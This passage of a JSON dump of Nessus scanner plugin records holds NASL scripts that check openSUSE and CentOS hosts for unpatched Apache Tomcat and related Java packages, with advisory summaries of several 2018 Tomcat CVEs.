script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:tomcat\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:tomcat-admin-webapps\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:tomcat-docs-webapp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:tomcat-el-3_0-api\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:novell:opensuse:tomcat-embed\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:tomcat-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:tomcat-jsp-2_3-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:tomcat-jsvc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:tomcat-lib\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:tomcat-servlet-4_0-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:tomcat-webapps\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:15.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/10/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/10/09\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE15\\.0)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"15.0\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE15.0\", reference:\"tomcat-9.0.10-lp150.2.3.2\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"tomcat-admin-webapps-9.0.10-lp150.2.3.2\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"tomcat-docs-webapp-9.0.10-lp150.2.3.2\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"tomcat-el-3_0-api-9.0.10-lp150.2.3.2\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"tomcat-embed-9.0.10-lp150.2.3.2\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"tomcat-javadoc-9.0.10-lp150.2.3.2\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"tomcat-jsp-2_3-api-9.0.10-lp150.2.3.2\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"tomcat-jsvc-9.0.10-lp150.2.3.2\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"tomcat-lib-9.0.10-lp150.2.3.2\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"tomcat-servlet-4_0-api-9.0.10-lp150.2.3.2\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"tomcat-webapps-9.0.10-lp150.2.3.2\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = 
pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"tomcat / tomcat-admin-webapps / tomcat-docs-webapp / etc\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:24:12", "description": "The remote CentOS Linux 8 host has packages installed that are affected by multiple vulnerabilities as referenced in the CESA-2019:1529 advisory.\n\n - tomcat: Open redirect in default servlet (CVE-2018-11784)\n\n - tomcat: Insecure defaults in CORS filter enable 'supportsCredentials' for all origins (CVE-2018-8014)\n\n - tomcat: Host name verification missing in WebSocket client (CVE-2018-8034)\n\n - tomcat: Due to a mishandling of close in NIO/NIO2 connectors user sessions can get mixed up (CVE-2018-8037)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2021-01-29T00:00:00", "type": "nessus", "title": "CentOS 8 : pki-deps:10.6 (CESA-2019:1529)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-11784", "CVE-2018-8014", "CVE-2018-8034", "CVE-2018-8037"], "modified": "2023-02-08T00:00:00", "cpe": ["cpe:/o:centos:centos:8", "p-cpe:/a:centos:centos:apache-commons-collections", "p-cpe:/a:centos:centos:apache-commons-lang", "p-cpe:/a:centos:centos:bea-stax-api", "p-cpe:/a:centos:centos:glassfish-fastinfoset", "p-cpe:/a:centos:centos:glassfish-jaxb-api", "p-cpe:/a:centos:centos:glassfish-jaxb-core", "p-cpe:/a:centos:centos:glassfish-jaxb-runtime", "p-cpe:/a:centos:centos:glassfish-jaxb-txw2", "p-cpe:/a:centos:centos:xmlstreambuffer", "p-cpe:/a:centos:centos:jackson-annotations", "p-cpe:/a:centos:centos:xsom", "p-cpe:/a:centos:centos:jackson-core", "p-cpe:/a:centos:centos:jackson-databind", "p-cpe:/a:centos:centos:jackson-jaxrs-json-provider", "p-cpe:/a:centos:centos:jackson-jaxrs-providers", "p-cpe:/a:centos:centos:jackson-module-jaxb-annotations", 
"p-cpe:/a:centos:centos:jakarta-commons-httpclient", "p-cpe:/a:centos:centos:javassist", "p-cpe:/a:centos:centos:javassist-javadoc", "p-cpe:/a:centos:centos:pki-servlet-4.0-api", "p-cpe:/a:centos:centos:pki-servlet-container", "p-cpe:/a:centos:centos:python-nss-doc", "p-cpe:/a:centos:centos:python3-nss", "p-cpe:/a:centos:centos:relaxngdatatype", "p-cpe:/a:centos:centos:resteasy", "p-cpe:/a:centos:centos:slf4j", "p-cpe:/a:centos:centos:slf4j-jdk14", "p-cpe:/a:centos:centos:stax-ex", "p-cpe:/a:centos:centos:velocity", "p-cpe:/a:centos:centos:xalan-j2", "p-cpe:/a:centos:centos:xerces-j2", "p-cpe:/a:centos:centos:xml-commons-apis", "p-cpe:/a:centos:centos:xml-commons-resolver"], "id": "CENTOS8_RHSA-2019-1529.NASL", "href": "https://www.tenable.com/plugins/nessus/145683", "sourceData": "##\n# (C) Tenable, Inc.\n#\n# The package checks in this plugin were extracted from\n# Red Hat Security Advisory RHSA-2019:1529. The text\n# itself is copyright (C) Red Hat, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(145683);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/02/08\");\n\n script_cve_id(\n \"CVE-2018-8014\",\n \"CVE-2018-8034\",\n \"CVE-2018-8037\",\n \"CVE-2018-11784\"\n );\n script_bugtraq_id(\n 104203,\n 104894,\n 104895,\n 105524\n );\n script_xref(name:\"RHSA\", value:\"2019:1529\");\n\n script_name(english:\"CentOS 8 : pki-deps:10.6 (CESA-2019:1529)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote CentOS host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote CentOS Linux 8 host has packages installed that are affected by multiple vulnerabilities as referenced in the\nCESA-2019:1529 advisory.\n\n - tomcat: Open redirect in default servlet (CVE-2018-11784)\n\n - tomcat: Insecure defaults in CORS filter enable 'supportsCredentials' for all origins (CVE-2018-8014)\n\n - tomcat: Host name verification 
missing in WebSocket client (CVE-2018-8034)\n\n - tomcat: Due to a mishandling of close in NIO/NIO2 connectors user sessions can get mixed up\n (CVE-2018-8037)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/errata/RHSA-2019:1529\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-8014\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/05/15\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/06/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/01/29\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:8\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:apache-commons-collections\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:apache-commons-lang\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:bea-stax-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:glassfish-fastinfoset\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:glassfish-jaxb-api\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:centos:centos:glassfish-jaxb-core\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:glassfish-jaxb-runtime\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:glassfish-jaxb-txw2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:jackson-annotations\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:jackson-core\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:jackson-databind\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:jackson-jaxrs-json-provider\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:jackson-jaxrs-providers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:jackson-module-jaxb-annotations\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:jakarta-commons-httpclient\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:javassist\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:javassist-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:pki-servlet-4.0-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:pki-servlet-container\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:python-nss-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:python3-nss\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:relaxngDatatype\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:resteasy\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:slf4j\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:slf4j-jdk14\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:stax-ex\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:centos:centos:velocity\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:xalan-j2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:xerces-j2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:xml-commons-apis\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:xml-commons-resolver\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:xmlstreambuffer\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:xsom\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CentOS Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude('rpm.inc');\ninclude('rhel.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nvar os_release = get_kb_item('Host/CentOS/release');\nif (isnull(os_release) || 'CentOS' >!< os_release) audit(AUDIT_OS_NOT, 'CentOS');\nvar os_ver = pregmatch(pattern: \"CentOS(?: Stream)?(?: Linux)? 
release ([0-9]+)\", string:os_release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'CentOS');\nos_ver = os_ver[1];\nif ('CentOS Stream' >< os_release) audit(AUDIT_OS_NOT, 'CentOS 8.x', 'CentOS Stream ' + os_ver);\nif (!rhel_check_release(operator: 'ge', os_version: os_ver, rhel_version: '8')) audit(AUDIT_OS_NOT, 'CentOS 8.x', 'CentOS ' + os_ver);\n\nif (!get_kb_item('Host/CentOS/rpm-list')) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'CentOS', cpu);\n\nvar module_ver = get_kb_item('Host/RedHat/appstream/pki-deps');\nif (isnull(module_ver)) audit(AUDIT_PACKAGE_NOT_INSTALLED, 'Module pki-deps:10.6');\nif ('10.6' >!< module_ver) audit(AUDIT_PACKAGE_NOT_AFFECTED, 'Module pki-deps:' + module_ver);\n\nvar appstreams = {\n 'pki-deps:10.6': [\n {'reference':'apache-commons-collections-3.2.2-10.module_el8.0.0+30+832da3a1', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'apache-commons-collections-3.2.2-10.module_el8.0.0+30+832da3a1', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'apache-commons-lang-2.6-21.module_el8.0.0+42+51564204', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'apache-commons-lang-2.6-21.module_el8.0.0+42+51564204', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'bea-stax-api-1.2.0-16.module_el8.0.0+42+51564204', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'bea-stax-api-1.2.0-16.module_el8.0.0+42+51564204', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'glassfish-fastinfoset-1.2.13-9.module_el8.0.0+42+51564204', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'glassfish-fastinfoset-1.2.13-9.module_el8.0.0+42+51564204', 'cpu':'x86_64', 'release':'8', 
'rpm_spec_vers_cmp':TRUE},\n {'reference':'glassfish-jaxb-api-2.2.12-8.module_el8.0.0+42+51564204', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'glassfish-jaxb-api-2.2.12-8.module_el8.0.0+42+51564204', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'glassfish-jaxb-core-2.2.11-11.module_el8.0.0+42+51564204', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'glassfish-jaxb-core-2.2.11-11.module_el8.0.0+42+51564204', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'glassfish-jaxb-runtime-2.2.11-11.module_el8.0.0+42+51564204', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'glassfish-jaxb-runtime-2.2.11-11.module_el8.0.0+42+51564204', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'glassfish-jaxb-txw2-2.2.11-11.module_el8.0.0+42+51564204', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'glassfish-jaxb-txw2-2.2.11-11.module_el8.0.0+42+51564204', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'jackson-annotations-2.9.8-1.module_el8.0.0+42+51564204', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'jackson-annotations-2.9.8-1.module_el8.0.0+42+51564204', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'jackson-core-2.9.8-1.module_el8.0.0+42+51564204', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'jackson-core-2.9.8-1.module_el8.0.0+42+51564204', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'jackson-databind-2.9.8-1.module_el8.0.0+42+51564204', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'jackson-databind-2.9.8-1.module_el8.0.0+42+51564204', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'jackson-jaxrs-json-provider-2.9.8-1.module_el8.0.0+42+51564204', 'cpu':'aarch64', 'release':'8', 
'rpm_spec_vers_cmp':TRUE},\n {'reference':'jackson-jaxrs-json-provider-2.9.8-1.module_el8.0.0+42+51564204', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'jackson-jaxrs-providers-2.9.8-1.module_el8.0.0+42+51564204', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'jackson-jaxrs-providers-2.9.8-1.module_el8.0.0+42+51564204', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'jackson-module-jaxb-annotations-2.7.6-4.module_el8.0.0+42+51564204', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'jackson-module-jaxb-annotations-2.7.6-4.module_el8.0.0+42+51564204', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'jakarta-commons-httpclient-3.1-28.module_el8.0.0+42+51564204', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'epoch':'1'},\n {'reference':'jakarta-commons-httpclient-3.1-28.module_el8.0.0+42+51564204', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'epoch':'1'},\n {'reference':'javassist-3.18.1-8.module_el8.0.0+30+832da3a1', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'javassist-3.18.1-8.module_el8.0.0+30+832da3a1', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'javassist-javadoc-3.18.1-8.module_el8.0.0+30+832da3a1', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'javassist-javadoc-3.18.1-8.module_el8.0.0+30+832da3a1', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'pki-servlet-4.0-api-9.0.7-14.module_el8.0.0+42+51564204', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'epoch':'1'},\n {'reference':'pki-servlet-4.0-api-9.0.7-14.module_el8.0.0+42+51564204', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'epoch':'1'},\n {'reference':'pki-servlet-container-9.0.7-14.module_el8.0.0+42+51564204', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'epoch':'1'},\n 
{'reference':'pki-servlet-container-9.0.7-14.module_el8.0.0+42+51564204', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'epoch':'1'},\n {'reference':'python-nss-doc-1.0.1-10.module_el8.0.0+42+51564204', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'python-nss-doc-1.0.1-10.module_el8.0.0+42+51564204', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'python3-nss-1.0.1-10.module_el8.0.0+42+51564204', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'python3-nss-1.0.1-10.module_el8.0.0+42+51564204', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'relaxngDatatype-2011.1-7.module_el8.0.0+42+51564204', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'relaxngDatatype-2011.1-7.module_el8.0.0+42+51564204', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'resteasy-3.0.26-3.module_el8.0.0+42+51564204', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'resteasy-3.0.26-3.module_el8.0.0+42+51564204', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'slf4j-1.7.25-4.module_el8.0.0+39+6a9b6e22', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'slf4j-1.7.25-4.module_el8.0.0+39+6a9b6e22', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'slf4j-jdk14-1.7.25-4.module_el8.0.0+39+6a9b6e22', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'slf4j-jdk14-1.7.25-4.module_el8.0.0+39+6a9b6e22', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'stax-ex-1.7.7-8.module_el8.0.0+42+51564204', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'stax-ex-1.7.7-8.module_el8.0.0+42+51564204', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'velocity-1.7-24.module_el8.0.0+42+51564204', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n 
{'reference':'velocity-1.7-24.module_el8.0.0+42+51564204', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'xalan-j2-2.7.1-38.module_el8.0.0+30+832da3a1', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'xalan-j2-2.7.1-38.module_el8.0.0+30+832da3a1', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'xerces-j2-2.11.0-34.module_el8.0.0+30+832da3a1', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'xerces-j2-2.11.0-34.module_el8.0.0+30+832da3a1', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'xml-commons-apis-1.4.01-25.module_el8.0.0+30+832da3a1', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'xml-commons-apis-1.4.01-25.module_el8.0.0+30+832da3a1', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'xml-commons-resolver-1.2-26.module_el8.0.0+30+832da3a1', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'xml-commons-resolver-1.2-26.module_el8.0.0+30+832da3a1', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'xmlstreambuffer-1.5.4-8.module_el8.0.0+42+51564204', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'xmlstreambuffer-1.5.4-8.module_el8.0.0+42+51564204', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'xsom-0-19.20110809svn.module_el8.0.0+42+51564204', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'xsom-0-19.20110809svn.module_el8.0.0+42+51564204', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE}\n ]\n};\n\nvar flag = 0;\nappstreams_found = 0;\nforeach module (keys(appstreams)) {\n var appstream = NULL;\n var appstream_name = NULL;\n var appstream_version = NULL;\n var appstream_split = split(module, sep:':', keep:FALSE);\n if (!empty_or_null(appstream_split)) {\n appstream_name = appstream_split[0];\n appstream_version = appstream_split[1];\n if 
(!empty_or_null(appstream_name)) appstream = get_one_kb_item('Host/RedHat/appstream/' + appstream_name);\n }\n if (!empty_or_null(appstream) && appstream_version == appstream || appstream_name == 'all') {\n appstreams_found++;\n foreach package_array ( appstreams[module] ) {\n var reference = NULL;\n var _release = NULL;\n var sp = NULL;\n var _cpu = NULL;\n var el_string = NULL;\n var rpm_spec_vers_cmp = NULL;\n var epoch = NULL;\n var allowmaj = NULL;\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) _release = 'CentOS-' + package_array['release'];\n if (!empty_or_null(package_array['sp'])) sp = package_array['sp'];\n if (!empty_or_null(package_array['cpu'])) _cpu = package_array['cpu'];\n if (!empty_or_null(package_array['el_string'])) el_string = package_array['el_string'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (!empty_or_null(package_array['epoch'])) epoch = package_array['epoch'];\n if (!empty_or_null(package_array['allowmaj'])) allowmaj = package_array['allowmaj'];\n if (reference && _release) {\n if (rpm_check(release:_release, sp:sp, cpu:_cpu, reference:reference, epoch:epoch, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n }\n }\n }\n}\n\nif (!appstreams_found) audit(AUDIT_PACKAGE_NOT_INSTALLED, 'Module pki-deps:10.6');\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'apache-commons-collections / apache-commons-lang / bea-stax-api / etc');\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-24T14:27:49", "description": "An update for tomcat is now available for Red Hat Enterprise Linux 7.\n\nRed Hat Product Security 
has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.\n\nApache Tomcat is a servlet container for the Java Servlet and JavaServer Pages (JSP) technologies.\n\nSecurity Fix(es) :\n\n* tomcat: Incorrect handling of empty string URL in security constraints can lead to unintended exposure of resources (CVE-2018-1304)\n\n* tomcat: Late application of security constraints can lead to resource exposure for unauthorised users (CVE-2018-1305)\n\n* tomcat: Insecure defaults in CORS filter enable 'supportsCredentials' for all origins (CVE-2018-8014)\n\n* tomcat: Host name verification missing in WebSocket client (CVE-2018-8034)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.\n\nAdditional Changes :\n\nFor detailed information on changes in this release, see the Red Hat Enterprise Linux 7.7 Release Notes linked from the References section.", "cvss3": {}, "published": "2019-08-30T00:00:00", "type": "nessus", "title": "CentOS 7 : tomcat (CESA-2019:2205)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-1304", "CVE-2018-1305", "CVE-2018-8014", "CVE-2018-8034"], "modified": "2019-12-31T00:00:00", "cpe": ["p-cpe:/a:centos:centos:tomcat", "p-cpe:/a:centos:centos:tomcat-admin-webapps", "p-cpe:/a:centos:centos:tomcat-docs-webapp", "p-cpe:/a:centos:centos:tomcat-el-2.2-api", "p-cpe:/a:centos:centos:tomcat-javadoc", "p-cpe:/a:centos:centos:tomcat-jsp-2.2-api", 